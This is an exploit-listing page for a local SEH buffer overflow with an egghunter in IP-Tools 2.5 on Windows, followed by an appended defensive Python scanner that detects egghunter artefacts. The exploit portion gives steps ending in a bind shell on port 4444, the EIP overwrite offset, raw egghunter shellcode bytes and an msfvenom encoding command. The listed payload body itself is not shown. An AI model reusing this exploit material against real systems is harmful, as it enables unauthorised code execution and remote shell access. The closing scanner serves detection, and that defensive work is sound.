Iptools 2.5 log to file local buffer overflow (seh) (egghunter) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-02-11 | Type: local | Platform: windows
This exploit / vulnerability, Iptools 2.5 log to file local buffer overflow (seh) (egghunter), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me to spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characters: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#
#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode preceded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes
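A defensive counterpart, added here and not part of the exploit or the original post: a small Python scanner that flags the raw WoW64 egghunter page-walk stub, the `mov eax, tag ; scasd` comparison and the doubled `w00tw00t` marker in a memory dump or captured input. It assumes the tag `w00t` and the hunter bytes quoted in the comment above; because the exploit transmits the hunter alpha-encoded, the opcode signatures only match in memory or after decoding, while the doubled tag is visible in the data field as pasted.

```python
"""Defensive scan for egghunter artefacts in a captured buffer (added example)."""
import re

# Raw (pre-encoding) WoW64 egghunter page-walk stub, as quoted on this page:
#   or dx, 0x0fff ; inc edx ; push edx ; push 0x26 ; pop eax
PAGE_WALK_STUB = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58"
# The hunter compares its tag twice (scasd ; jne ; scasd ; jne), so the
# egg in memory is the tag doubled: "w00tw00t".  Tag assumed from the page.
EGG_TAG = b"w00t"

# mov eax, "w00t" followed within a few bytes by scasd (the tag comparison).
TAG_LOAD_RE = re.compile(rb"\xb8" + re.escape(EGG_TAG) + rb".{0,4}\xaf", re.DOTALL)


def find_egghunter_artifacts(buf: bytes) -> dict:
    """Return the offsets of each artefact class found in buf."""
    return {
        "page_walk": [m.start() for m in re.finditer(re.escape(PAGE_WALK_STUB), buf)],
        "tag_load": [m.start() for m in TAG_LOAD_RE.finditer(buf)],
        "doubled_tag": [m.start() for m in re.finditer(re.escape(EGG_TAG * 2), buf)],
    }


def is_suspicious(buf: bytes) -> bool:
    """True when any egghunter artefact is present in the buffer."""
    return any(find_egghunter_artifacts(buf).values())


# Constructed sample: fragments of the hunter quoted on the page, placed in a
# buffer next to a doubled tag (as the egg marker would appear in the data field).
SAMPLE = (
    b"A" * 16
    + PAGE_WALK_STUB                        # offset 16
    + b"\x33\xc9\x8b\xd4"                   # xor ecx,ecx ; mov edx,esp
    + b"\xb8" + EGG_TAG + b"\x8b\xfa\xaf"   # offset 30: mov eax,tag ; mov edi,edx ; scasd
    + b"B" * 8
    + EGG_TAG * 2                           # offset 46: the egg marker
    + b"C" * 4
)

if __name__ == "__main__":
    print(find_egghunter_artifacts(SAMPLE))
    print("suspicious:", is_suspicious(SAMPLE))
```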